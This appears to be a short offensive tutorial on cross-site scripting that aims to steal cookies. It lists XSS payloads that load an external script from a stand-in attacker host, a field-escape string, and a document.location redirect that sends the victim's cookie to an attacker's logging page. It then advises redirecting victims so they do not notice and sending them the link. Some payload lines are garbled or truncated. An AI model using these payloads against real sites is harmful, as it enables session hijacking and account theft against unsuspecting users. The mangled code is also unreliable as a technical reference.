Here is where I will discuss some different syntaxes of XSS and how to steal cookies. I will also explain the idea of how the XSS syntaxes work.
< script src=http://site.com/evil.js >
'"/ >< />< script src=http://site.com/evil.js >
This is what I mostly use to escape fields on the website. Let's say that I search for "test", and the next page has the word "test" in the search field again, I will try to escape it with this code.
< img src=xss.png
< script> document.location
siteb.com";< /script >
This script will redirect the webpage to http://sitea.com/log.php?c=[THEIR COOKIE]&redirect=http://siteb.com
The GET variable c contains the user's cookie from the following page. The redirect part is just another GET var that will redirect them away from the logger, to another website, so that they do not notice anything TOO strange. The best way to avoid suspicion is to redirect them to the same site, just a different page.
After that, all that is pretty much left to do is send a link containing the URL with the XSS vulnerability in it to your victim and let he/she click it, while you wait for your cookies.
Back to Main Content